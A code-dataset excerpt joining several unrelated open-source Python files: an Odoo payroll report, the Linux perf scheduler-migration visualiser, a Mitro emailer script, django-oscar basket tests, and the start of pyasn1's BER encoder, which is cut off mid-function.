                        LEFT JOIN hr_payslip as p on pl.slip_id = p.id \
                        LEFT JOIN hr_employee as emp on emp.id = p.employee_id \
                        WHERE p.employee_id = %s \
                        GROUP BY rc.parent_id, pl.sequence, pl.id, pl.category_id,pl.name,p.date_to,rc.code \
                        ORDER BY pl.sequence, rc.parent_id''',(emp_id,))
        salary = self.cr.fetchall()
        # Build {category_code: {rule_name: {"mm-yyyy": amount}}}.
        for category in salary:
            if category[0] not in salaries:
                salaries.setdefault(category[0], {})
                salaries[category[0]].update({category[1]: {category[3]: category[2]}})
            elif category[1] not in salaries[category[0]]:
                salaries[category[0]].setdefault(category[1], {})
                salaries[category[0]][category[1]].update({category[3]: category[2]})
            else:
                salaries[category[0]][category[1]].update({category[3]: category[2]})
        category_ids = category_obj.search(self.cr,self.uid, [], context=self.context)
        categories = category_obj.read(self.cr, self.uid, category_ids, ['code'], context=self.context)
        for code in map(lambda x: x['code'], categories):
            if code in salaries:
                res = self.salary_list(salaries[code])
                result.append(res)
        return result
    def salary_list(self, salaries):
        """Turn {rule_name: {month: amount}} into rows of 12 month columns
        followed by the row total."""
        cat_salary_all = []
        for category_name,amount in salaries.items():
            cat_salary = []
            total = 0.0
            cat_salary.append(category_name)
            for mnth in self.mnths:
                # '<>' is the Python 2-only spelling of '!='.
                if mnth <> 'None':
                    # Zero-pad single-digit months to match "mm-yyyy" keys.
                    if len(mnth) != 7:
                        mnth = '0' + str(mnth)
                    if mnth in amount and amount[mnth]:
                        cat_salary.append(amount[mnth])
                        total += amount[mnth]
                    else:
                        cat_salary.append(0.00)
                else:
                    cat_salary.append('')
            cat_salary.append(total)
            cat_salary_all.append(cat_salary)
        return cat_salary_all
    def get_allow(self):
        # Allowance rows computed by get_employee_detail().
        return self.allow_list
    def get_deduct(self):
        # Deduction rows computed by get_employee_detail().
        return self.deduct_list
    def get_total(self):
        # Grand total accumulated by get_employee_detail().
        return self.total
class wrapped_report_payslip(osv.AbstractModel):
    """Registers the yearly-salary rml parser as the report model for its template."""
    # Report service name (matches the report action's report_name).
    _name = 'report.l10n_in_hr_payroll.report_hryearlysalary'
    _inherit = 'report.abstract_report'
    # Template rendered with the wrapped parser below.
    _template = 'l10n_in_hr_payroll.report_hryearlysalary'
    _wrapped_report_class = employees_yearly_salary_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
bestmjh47/ActiveKernel_EF33S | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <fweisbec@gmail.com>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
# pid -> last known command name; pid 0 is always the idle task.
threads = {0: "idle"}

def thread_name(pid):
	"""Return a human-readable "comm:pid" label for *pid*."""
	return "{0}:{1:d}".format(threads[pid], pid)
class RunqueueEventUnknown:
	"""Fallback runqueue event when no specific state change was recorded."""
	@staticmethod
	def color():
		# No dedicated color: callers paint the default background.
		return None
	def __repr__(self):
		return "unknown"
class RunqueueEventSleep:
	"""Runqueue event: a task left the queue to sleep."""
	def __init__(self, sleeper):
		# pid of the task that went to sleep
		self.sleeper = sleeper
	@staticmethod
	def color():
		# pure blue
		return (0, 0, 255)
	def __repr__(self):
		return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
	"""Runqueue event: a sleeping task was woken up."""
	def __init__(self, wakee):
		# pid of the task that woke up
		self.wakee = wakee
	@staticmethod
	def color():
		# yellow
		return (255, 255, 0)
	def __repr__(self):
		return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
	"""Runqueue event: a newly forked task appeared on the queue."""
	def __init__(self, child):
		# pid of the freshly forked child
		self.child = child
	@staticmethod
	def color():
		# green
		return (0, 255, 0)
	def __repr__(self):
		return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
	"""Runqueue event: a task migrated onto this CPU."""
	def __init__(self, new):
		# pid of the task that arrived
		self.new = new
	@staticmethod
	def color():
		# cyan-ish
		return (0, 240, 255)
	def __repr__(self):
		return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
	"""Runqueue event: a task migrated away from this CPU."""
	def __init__(self, old):
		# pid of the task that left
		self.old = old
	@staticmethod
	def color():
		# magenta
		return (255, 0, 255)
	def __repr__(self):
		return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
	"""Snapshot of one CPU runqueue: the task pids on it plus the last event."""
	def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
		# NOTE(review): the mutable/shared defaults are only read here (tasks
		# is copied into a tuple), so the shared-default pitfall is avoided.
		self.tasks = tuple(tasks)
		self.event = event
	def sched_switch(self, prev, prev_state, next):
		"""Return the snapshot resulting from a prev -> next context switch."""
		event = RunqueueEventUnknown()
		# Nothing changes when a still-runnable task switches to a task
		# that is already accounted on this runqueue.
		if taskState(prev_state) == "R" and next in self.tasks \
			and prev in self.tasks:
			return self
		if taskState(prev_state) != "R":
			event = RunqueueEventSleep(prev)
		next_tasks = list(self.tasks[:])
		if prev in self.tasks:
			if taskState(prev_state) != "R":
				next_tasks.remove(prev)
		elif taskState(prev_state) == "R":
			next_tasks.append(prev)
		if next not in next_tasks:
			next_tasks.append(next)
		return RunqueueSnapshot(next_tasks, event)
	def migrate_out(self, old):
		"""Return the snapshot after task 'old' migrated to another CPU."""
		if old not in self.tasks:
			return self
		next_tasks = [task for task in self.tasks if task != old]
		return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
	def __migrate_in(self, new, event):
		# Shared helper for migrate_in/wake_up/wake_up_new; only the event
		# recorded on the resulting snapshot differs between callers.
		if new in self.tasks:
			self.event = event
			return self
		next_tasks = self.tasks[:] + tuple([new])
		return RunqueueSnapshot(next_tasks, event)
	def migrate_in(self, new):
		return self.__migrate_in(new, RunqueueMigrateIn(new))
	def wake_up(self, new):
		return self.__migrate_in(new, RunqueueEventWakeup(new))
	def wake_up_new(self, new):
		return self.__migrate_in(new, RunqueueEventFork(new))
	def load(self):
		""" Provide the number of tasks on the runqueue.
		    Don't count idle"""
		return len(self.tasks) - 1
	def __repr__(self):
		# NOTE(review): origin_tostring() is not defined anywhere in this
		# file, so calling repr() on a snapshot would raise AttributeError.
		ret = self.tasks.__repr__()
		ret += self.origin_tostring()
		return ret
class TimeSlice:
	"""State of all runqueues between two consecutive scheduler events.

	Each slice starts from the previous slice's runqueues and total load,
	then applies one event (switch, migration or wakeup)."""
	def __init__(self, start, prev):
		self.start = start
		self.prev = prev
		self.end = start
		# cpus that triggered the event
		self.event_cpus = []
		if prev is not None:
			self.total_load = prev.total_load
			self.rqs = prev.rqs.copy()
		else:
			self.rqs = defaultdict(RunqueueSnapshot)
			self.total_load = 0
	def __update_total_load(self, old_rq, new_rq):
		# Keep the across-CPU load sum consistent with the rq replacement.
		diff = new_rq.load() - old_rq.load()
		self.total_load += diff
	def sched_switch(self, ts_list, prev, prev_state, next, cpu):
		"""Apply a context switch on 'cpu'; append self to ts_list if it changed anything."""
		old_rq = self.prev.rqs[cpu]
		new_rq = old_rq.sched_switch(prev, prev_state, next)
		if old_rq is new_rq:
			return
		self.rqs[cpu] = new_rq
		self.__update_total_load(old_rq, new_rq)
		ts_list.append(self)
		self.event_cpus = [cpu]
	def migrate(self, ts_list, new, old_cpu, new_cpu):
		"""Move task 'new' from old_cpu's runqueue to new_cpu's runqueue."""
		if old_cpu == new_cpu:
			return
		old_rq = self.prev.rqs[old_cpu]
		out_rq = old_rq.migrate_out(new)
		self.rqs[old_cpu] = out_rq
		self.__update_total_load(old_rq, out_rq)
		new_rq = self.prev.rqs[new_cpu]
		in_rq = new_rq.migrate_in(new)
		self.rqs[new_cpu] = in_rq
		self.__update_total_load(new_rq, in_rq)
		ts_list.append(self)
		# Only mark the source cpu when the task was actually removed there.
		if old_rq is not out_rq:
			self.event_cpus.append(old_cpu)
		self.event_cpus.append(new_cpu)
	def wake_up(self, ts_list, pid, cpu, fork):
		"""Apply a (possibly fork-time) wakeup of 'pid' on 'cpu'."""
		old_rq = self.prev.rqs[cpu]
		if fork:
			new_rq = old_rq.wake_up_new(pid)
		else:
			new_rq = old_rq.wake_up(pid)
		if new_rq is old_rq:
			return
		self.rqs[cpu] = new_rq
		self.__update_total_load(old_rq, new_rq)
		ts_list.append(self)
		self.event_cpus = [cpu]
	def next(self, t):
		"""Close this slice at time t and return the follow-up slice."""
		self.end = t
		return TimeSlice(t, self)
class TimeSliceList(UserList):
	"""Ordered list of TimeSlices plus the drawing callbacks for the GUI."""
	def __init__(self, arg = []):
		# NOTE(review): mutable default list follows the UserList-style API;
		# callers in this file never share it.
		self.data = arg
	def get_time_slice(self, ts):
		"""Return the slice beginning at ts (chained to the last slice, or fresh)."""
		if len(self.data) == 0:
			slice = TimeSlice(ts, TimeSlice(-1, None))
		else:
			slice = self.data[-1].next(ts)
		return slice
	def find_time_slice(self, ts):
		"""Binary-search the index of the slice containing ts, or -1.

		Python 2 code: '/' below is integer division."""
		start = 0
		end = len(self.data)
		found = -1
		searching = True
		while searching:
			if start == end or start == end - 1:
				searching = False
			i = (end + start) / 2
			if self.data[i].start <= ts and self.data[i].end >= ts:
				found = i
				end = i
				continue
			if self.data[i].end < ts:
				start = i
			elif self.data[i].start > ts:
				end = i
		return found
	def set_root_win(self, win):
		# GUI window used by mouse_down/update_rectangle_cpu below.
		self.root_win = win
	def mouse_down(self, cpu, t):
		"""Show a textual summary of cpu's runqueue at time t in the GUI."""
		idx = self.find_time_slice(t)
		if idx == -1:
			return
		ts = self[idx]
		rq = ts.rqs[cpu]
		raw = "CPU: %d\n" % cpu
		raw += "Last event : %s\n" % rq.event.__repr__()
		raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
		raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
		raw += "Load = %d\n" % rq.load()
		for t in rq.tasks:
			raw += "%s \n" % thread_name(t)
		self.root_win.update_summary(raw)
	def update_rectangle_cpu(self, slice, cpu):
		"""Paint one cpu/slice rectangle: redder means higher relative load."""
		rq = slice.rqs[cpu]
		if slice.total_load != 0:
			load_rate = rq.load() / float(slice.total_load)
		else:
			load_rate = 0
		red_power = int(0xff - (0xff * load_rate))
		color = (0xff, red_power, red_power)
		top_color = None
		# Highlight the cpus on which the slice's event happened.
		if cpu in slice.event_cpus:
			top_color = rq.event.color()
		self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
	def fill_zone(self, start, end):
		"""Repaint every cpu rectangle for slices overlapping [start, end]."""
		i = self.find_time_slice(start)
		if i == -1:
			return
		for i in xrange(i, len(self.data)):
			timeslice = self.data[i]
			if timeslice.start > end:
				return
			for cpu in timeslice.rqs:
				self.update_rectangle_cpu(timeslice, cpu)
	def interval(self):
		"""Return the (first start, last end) time span covered by the list."""
		if len(self.data) == 0:
			return (0, 0)
		return (self.data[0].start, self.data[-1].end)
	def nr_rectangles(self):
		"""Return the highest cpu number seen in the final slice."""
		last_ts = self.data[-1]
		max_cpu = 0
		for cpu in last_ts.rqs:
			if cpu > max_cpu:
				max_cpu = cpu
		return max_cpu
class SchedEventProxy:
    """Receives raw perf sched tracepoints and feeds them into timeslices.

    Tracks the task currently running on each CPU so that a sched_switch
    that disagrees with the recorded state can be flagged as a missed trace.
    """

    def __init__(self):
        # cpu -> pid currently on that CPU; -1 means "not seen yet".
        self.current_tsk = defaultdict(lambda : -1)
        self.timeslices = TimeSliceList()

    def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
                     next_comm, next_pid, next_prio):
        """ Ensure the task we sched out this cpu is really the one
        we logged. Otherwise we may have missed traces """
        on_cpu_task = self.current_tsk[headers.cpu]
        if on_cpu_task != -1 and on_cpu_task != prev_pid:
            print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
                (headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)

        # Remember command names for display (module-global map).
        threads[prev_pid] = prev_comm
        threads[next_pid] = next_comm
        self.current_tsk[headers.cpu] = next_pid

        ts = self.timeslices.get_time_slice(headers.ts())
        ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)

    def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
        """Forward a task-migration event to the current time slice."""
        ts = self.timeslices.get_time_slice(headers.ts())
        ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)

    def wake_up(self, headers, comm, pid, success, target_cpu, fork):
        """Forward a successful wakeup event to the current time slice."""
        if success == 0:
            return
        ts = self.timeslices.get_time_slice(headers.ts())
        ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
    """perf hook: called once before event processing starts."""
    global parser
    parser = SchedEventProxy()
def trace_end():
    """perf hook: called after the trace is consumed; opens the wx GUI."""
    app = wx.App(False)
    timeslices = parser.timeslices
    frame = RootFrame(timeslices, "Migration")
    app.MainLoop()
# The following sched tracepoints are delivered by perf but not used by
# this visualisation; they are accepted and ignored.

def sched__sched_stat_runtime(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, runtime, vruntime):
    pass

def sched__sched_stat_iowait(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, delay):
    pass

def sched__sched_stat_sleep(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, delay):
    pass

def sched__sched_stat_wait(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, delay):
    pass

def sched__sched_process_fork(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        parent_comm, parent_pid, child_comm, child_pid):
    pass

def sched__sched_process_wait(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio):
    pass

def sched__sched_process_exit(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio):
    pass

def sched__sched_process_free(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio):
    pass
# Active tracepoint handlers: wrap the raw per-event header fields in an
# EventHeaders object and forward to the module-level parser built by
# trace_begin().

def sched__sched_migrate_task(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio, orig_cpu,
        dest_cpu):
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)
    parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)

def sched__sched_switch(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        prev_comm, prev_pid, prev_prio, prev_state,
        next_comm, next_pid, next_prio):
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)
    parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
        next_comm, next_pid, next_prio)

def sched__sched_wakeup_new(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio, success,
        target_cpu):
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)
    # fork=1: the woken task was just created.
    parser.wake_up(headers, comm, pid, success, target_cpu, 1)

def sched__sched_wakeup(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio, success,
        target_cpu):
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
        common_pid, common_comm)
    # fork=0: wakeup of an already-existing task.
    parser.wake_up(headers, comm, pid, success, target_cpu, 0)
# Remaining tracepoints and the catch-all hook; ignored by this tool.

def sched__sched_wait_task(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid, prio):
    pass

def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        ret):
    pass

def sched__sched_kthread_stop(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        comm, pid):
    pass

def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
        common_pid, common_comm):
    pass
| gpl-2.0 |
ahmedalsudani/mitro | emailer/emailer2.py | 24 | 2339 | #!/usr/bin/env python
'''Emailer2: Send users emails
Uses Amazon SES to send emails.
To create a new template:
1. Write the HTML for the template into templates/templatename_html.html
2. Convert to email using http://premailer.dialect.ca/ . Save as templates/templatename.html
WARNING: Premailer will escape templates ({{}}) in links; manually fix these
3. Save a plain text version as templates/templatename.txt
4. Add type string to email_queue.py as _TYPE_(NAME), add to _VALID_TYPES
5. Add a new else if to _loop_once
6. Write the function to send the email (copy the existing examples?)
'''
import datetime
import json
import logging
import sqlalchemy
import sqlalchemy.exc
import sqlalchemy.ext.declarative
import sqlalchemy.orm
from sqlalchemy.pool import StaticPool
from sqlalchemy.pool import NullPool
import tornado.options
from auth import email_queue
from auth import models2
from auth import statsd
Session = sqlalchemy.orm.sessionmaker()
_once = False
def connect_to_database(url):
    """Bind the module-level Session factory to the database at `url`.

    Must be called exactly once per process; a second call raises
    RuntimeError.
    """
    global _once
    # Bug fix: this guard used `assert`, which is silently stripped under
    # `python -O`; raise explicitly so double initialisation always fails.
    if _once:
        raise RuntimeError('connect_to_database() must only be called once')
    _once = True

    # NullPool: a fresh connection per checkout (no pooling), appropriate
    # for this long-lived single-purpose worker. Uses the name imported at
    # the top of the file for consistency.
    engine = sqlalchemy.create_engine(url, poolclass=NullPool, echo=False)
    Session.configure(bind=engine)
def main():
    """Entry point: configure logging, connect to Postgres and poll the
    email queue forever, retrying transient database outages with backoff."""
    logging.root.setLevel(logging.INFO)

    connect_to_database('postgres:///mitro')
    extra_args = tornado.options.parse_command_line()

    # Verify that mandrill is configured
    if tornado.options.options.enable_email:
        assert len(tornado.options.options.mandrill_api_key) > 0

    # Datadog listens for statsd requests on port 8125
    statsd_client = statsd.StatsdClient('localhost', 8125, 'emailer')

    backoff_sleeper = email_queue.BackoffSleeper()
    email_queue_type = models2.EmailQueue
    while True:
        try:
            email_queue.poll_forever(Session, email_queue_type, statsd_client)
        except sqlalchemy.exc.OperationalError, e:
            # In case Postgres is not running, retry the connection a few times before dying.
            # This is long enough to get upstart to keep restarting the emailer
            if not backoff_sleeper.shouldRetryAfterSleep():
                logging.error('Failing after %d retries', backoff_sleeper.max_retries())
                raise
            logging.error('SQLAlchemy exception; retrying after timeout')
| gpl-3.0 |
dongguangming/django-oscar | tests/integration/basket/model_tests.py | 35 | 4877 | from decimal import Decimal as D
from django.test import TestCase
from oscar.apps.basket.models import Basket
from oscar.apps.partner import strategy
from oscar.test import factories
from oscar.apps.catalogue.models import Option
class TestAddingAProductToABasket(TestCase):
    """Behaviour of Basket.add() for a basket holding one GBP product."""

    def setUp(self):
        self.basket = Basket()
        self.basket.strategy = strategy.Default()
        self.product = factories.create_product()
        self.record = factories.create_stockrecord(
            currency='GBP',
            product=self.product, price_excl_tax=D('10.00'))
        self.purchase_info = factories.create_purchase_info(self.record)
        self.basket.add(self.product)

    def test_creates_a_line(self):
        self.assertEqual(1, self.basket.num_lines)

    def test_sets_line_prices(self):
        # Line prices must be copied from the stockrecord's purchase info.
        line = self.basket.lines.all()[0]
        self.assertEqual(line.price_incl_tax, self.purchase_info.price.incl_tax)
        self.assertEqual(line.price_excl_tax, self.purchase_info.price.excl_tax)

    def test_means_another_currency_product_cannot_be_added(self):
        # A basket must stay single-currency: adding a USD product to a
        # GBP basket is rejected with ValueError.
        product = factories.create_product()
        factories.create_stockrecord(
            currency='USD', product=product, price_excl_tax=D('20.00'))
        with self.assertRaises(ValueError):
            self.basket.add(product)
class TestANonEmptyBasket(TestCase):
    """Quantity accounting of a basket pre-loaded with 10 of one product."""

    def setUp(self):
        self.basket = Basket()
        self.basket.strategy = strategy.Default()
        self.product = factories.create_product()
        self.record = factories.create_stockrecord(
            self.product, price_excl_tax=D('10.00'))
        self.purchase_info = factories.create_purchase_info(self.record)
        self.basket.add(self.product, 10)

    def test_can_be_flushed(self):
        self.basket.flush()
        self.assertEqual(self.basket.num_items, 0)

    def test_returns_correct_product_quantity(self):
        self.assertEqual(10, self.basket.product_quantity(
            self.product))

    def test_returns_correct_line_quantity_for_existing_product_and_stockrecord(self):
        self.assertEqual(10, self.basket.line_quantity(
            self.product, self.record))

    def test_returns_zero_line_quantity_for_alternative_stockrecord(self):
        # Lines are keyed by (product, stockrecord): a different record
        # for the same product counts as a different line.
        record = factories.create_stockrecord(
            self.product, price_excl_tax=D('5.00'))
        self.assertEqual(0, self.basket.line_quantity(
            self.product, record))

    def test_returns_zero_line_quantity_for_missing_product_and_stockrecord(self):
        product = factories.create_product()
        record = factories.create_stockrecord(
            product, price_excl_tax=D('5.00'))
        self.assertEqual(0, self.basket.line_quantity(
            product, record))

    def test_returns_correct_quantity_for_existing_product_and_stockrecord_and_options(self):
        # Options further discriminate lines: same product/record with and
        # without options are distinct lines.
        product = factories.create_product()
        record = factories.create_stockrecord(
            product, price_excl_tax=D('5.00'))
        option = Option.objects.create(name="Message")
        options = [{"option": option, "value": "2"}]
        self.basket.add(product, options=options)
        self.assertEqual(0, self.basket.line_quantity(
            product, record))
        self.assertEqual(1, self.basket.line_quantity(
            product, record, options))
class TestMergingTwoBaskets(TestCase):
    """Merging two baskets that contain the same product line."""

    def setUp(self):
        self.product = factories.create_product()
        self.record = factories.create_stockrecord(
            self.product, price_excl_tax=D('10.00'))
        self.purchase_info = factories.create_purchase_info(self.record)

        self.main_basket = Basket()
        self.main_basket.strategy = strategy.Default()
        self.main_basket.add(self.product, quantity=2)

        self.merge_basket = Basket()
        self.merge_basket.strategy = strategy.Default()
        self.merge_basket.add(self.product, quantity=1)

        self.main_basket.merge(self.merge_basket)

    def test_doesnt_sum_quantities(self):
        # merge() keeps the target basket's line rather than adding the
        # quantities of duplicate lines together.
        self.assertEqual(1, self.main_basket.num_lines)

    def test_changes_status_of_merge_basket(self):
        self.assertEqual(Basket.MERGED, self.merge_basket.status)
class TestASubmittedBasket(TestCase):
    """State flags of a basket once it has been submitted."""

    def setUp(self):
        basket = Basket()
        basket.strategy = strategy.Default()
        basket.submit()
        self.basket = basket

    def test_has_correct_status(self):
        self.assertTrue(self.basket.is_submitted)

    def test_can_be_edited(self):
        self.assertFalse(self.basket.can_be_edited)
class TestMergingAVoucherBasket(TestCase):
    """Vouchers attached to a merged basket move to the target basket."""

    def test_transfers_vouchers_to_new_basket(self):
        baskets = [factories.BasketFactory(), factories.BasketFactory()]
        voucher = factories.VoucherFactory()
        baskets[0].vouchers.add(voucher)
        baskets[1].merge(baskets[0])

        self.assertEqual(1, baskets[1].vouchers.all().count())
| bsd-3-clause |
coolbombom/CouchPotatoServer | libs/pyasn1/codec/ber/encoder.py | 20 | 12392 | # BER encoder
from pyasn1.type import base, tag, univ, char, useful
from pyasn1.codec.ber import eoo
from pyasn1.compat.octets import int2oct, ints2octs, null, str2octs
from pyasn1 import error
class Error(Exception): pass
class AbstractItemEncoder:
    """Base class for BER item encoders.

    Handles identifier (tag) and length octets; subclasses provide the
    contents octets via encodeValue().
    """
    # Set to 0 by primitive-only subclasses to force definite-length form
    # even when the caller requested indefinite mode.
    supportIndefLenMode = 1

    def encodeTag(self, t, isConstructed):
        """Encode tag `t` into identifier octets (X.690 8.1.2)."""
        tagClass, tagFormat, tagId = t.asTuple()  # this is a hotspot
        v = tagClass | tagFormat
        if isConstructed:
            v = v|tag.tagFormatConstructed
        if tagId < 31:
            # Low-tag-number form: one octet.
            return int2oct(v|tagId)
        else:
            # High-tag-number form: 0x1F marker then base-128 big-endian
            # digits, continuation bit set on all but the last.
            s = int2oct(tagId&0x7f)
            tagId = tagId >> 7
            while tagId:
                s = int2oct(0x80|(tagId&0x7f)) + s
                tagId = tagId >> 7
            return int2oct(v|0x1F) + s

    def encodeLength(self, length, defMode):
        """Encode `length` into length octets (X.690 8.1.3)."""
        if not defMode and self.supportIndefLenMode:
            return int2oct(0x80)  # indefinite form
        if length < 0x80:
            return int2oct(length)  # short definite form
        else:
            # Long definite form: 0x80|count, then the big-endian length.
            substrate = null
            while length:
                substrate = int2oct(length&0xff) + substrate
                length = length >> 8
            substrateLen = len(substrate)
            if substrateLen > 126:
                raise Error('Length octets overflow (%d)' % substrateLen)
            return int2oct(0x80 | substrateLen) + substrate

    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        # Subclass responsibility: return (contents octets, isConstructed).
        raise Error('Not implemented')

    def _encodeEndOfOctets(self, encodeFun, defMode):
        if defMode or not self.supportIndefLenMode:
            return null
        else:
            # Indefinite mode: contents are terminated by the EOC marker.
            return encodeFun(eoo.endOfOctets, defMode)

    def encode(self, encodeFun, value, defMode, maxChunkSize):
        """Encode `value` as tag + length + contents (+ EOC if indefinite)."""
        substrate, isConstructed = self.encodeValue(
            encodeFun, value, defMode, maxChunkSize
            )
        tagSet = value.getTagSet()
        if tagSet:
            if not isConstructed:  # primitive form implies definite mode
                defMode = 1
            return self.encodeTag(
                tagSet[-1], isConstructed
                ) + self.encodeLength(
                len(substrate), defMode
                ) + substrate + self._encodeEndOfOctets(encodeFun, defMode)
        else:
            return substrate  # untagged value
class EndOfOctetsEncoder(AbstractItemEncoder):
    """Encodes the end-of-contents marker: empty primitive contents."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        return null, 0
class ExplicitlyTaggedItemEncoder(AbstractItemEncoder):
    """Handles multi-tagged values: peels off the outermost tag and
    recursively encodes the remainder as this tag's contents."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        if isinstance(value, base.AbstractConstructedAsn1Item):
            value = value.clone(tagSet=value.getTagSet()[:-1],
                                cloneValueFlag=1)
        else:
            value = value.clone(tagSet=value.getTagSet()[:-1])
        return encodeFun(value, defMode, maxChunkSize), 1

explicitlyTaggedItemEncoder = ExplicitlyTaggedItemEncoder()
class IntegerEncoder(AbstractItemEncoder):
    """Encodes INTEGER-like values (also BOOLEAN, ENUMERATED) as a minimal
    big-endian two's complement octet string."""
    supportIndefLenMode = 0  # primitive type: always definite length

    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        octets = []
        value = int(value)  # to save on ops on asn1 type
        # Peel off low octets until only the sign pattern (0 or -1) remains.
        while 1:
            octets.insert(0, value & 0xff)
            if value == 0 or value == -1:
                break
            value = value >> 8
        # A positive number whose top bit is set needs a leading 0x00.
        if value == 0 and octets[0] & 0x80:
            octets.insert(0, 0)
        # Strip redundant leading 0x00/0xff octets (X.690 8.3.2).
        while len(octets) > 1 and \
                  (octets[0] == 0 and octets[1] & 0x80 == 0 or \
                   octets[0] == 0xff and octets[1] & 0x80 != 0):
            del octets[0]
        return ints2octs(octets), 0
class BitStringEncoder(AbstractItemEncoder):
    """Encodes BIT STRING: an unused-bits octet followed by packed bits;
    splits into a constructed encoding when larger than maxChunkSize."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        if not maxChunkSize or len(value) <= maxChunkSize*8:
            # Pack bits MSB-first into a dict of octet-index -> octet value.
            r = {}; l = len(value); p = 0; j = 7
            while p < l:
                i, j = divmod(p, 8)
                r[i] = r.get(i,0) | value[p]<<(7-j)
                p = p + 1
            keys = list(r); keys.sort()
            # Leading octet = number of unused bits in the final octet.
            return int2oct(7-j) + ints2octs([r[k] for k in keys]), 0
        else:
            # Constructed form: emit successive sub-BIT STRING chunks.
            pos = 0; substrate = null
            while 1:
                # count in octets
                v = value.clone(value[pos*8:pos*8+maxChunkSize*8])
                if not v:
                    break
                substrate = substrate + encodeFun(v, defMode, maxChunkSize)
                pos = pos + maxChunkSize
            return substrate, 1
class OctetStringEncoder(AbstractItemEncoder):
    """Encodes OCTET STRING (and, via the tag map, all character string
    types); chunks into a constructed encoding above maxChunkSize."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        if not maxChunkSize or len(value) <= maxChunkSize:
            return value.asOctets(), 0
        else:
            # Constructed form: successive sub-strings of maxChunkSize.
            pos = 0; substrate = null
            while 1:
                v = value.clone(value[pos:pos+maxChunkSize])
                if not v:
                    break
                substrate = substrate + encodeFun(v, defMode, maxChunkSize)
                pos = pos + maxChunkSize
            return substrate, 1
class NullEncoder(AbstractItemEncoder):
    """Encodes NULL: empty contents, always definite length."""
    supportIndefLenMode = 0
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        return null, 0
class ObjectIdentifierEncoder(AbstractItemEncoder):
    """Encodes OBJECT IDENTIFIER values (X.690 8.19)."""
    supportIndefLenMode = 0
    # Pre-encoded forms of the two most common OID prefixes.
    precomputedValues = {
        (1, 3, 6, 1, 2): (43, 6, 1, 2),
        (1, 3, 6, 1, 4): (43, 6, 1, 4)
    }
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        oid = value.asTuple()
        if oid[:5] in self.precomputedValues:
            octets = self.precomputedValues[oid[:5]]
            index = 5
        else:
            if len(oid) < 2:
                raise error.PyAsn1Error('Short OID %s' % value)

            # Build the first twos (first two arcs pack as X*40+Y)
            index = 0
            subid = oid[index] * 40
            subid = subid + oid[index+1]
            if subid < 0 or subid > 0xff:
                raise error.PyAsn1Error(
                    'Initial sub-ID overflow %s in OID %s' % (oid[index:], value)
                    )
            octets = (subid,)
            index = index + 2

        # Cycle through subids
        for subid in oid[index:]:
            if subid > -1 and subid < 128:
                # Optimize for the common case
                octets = octets + (subid & 0x7f,)
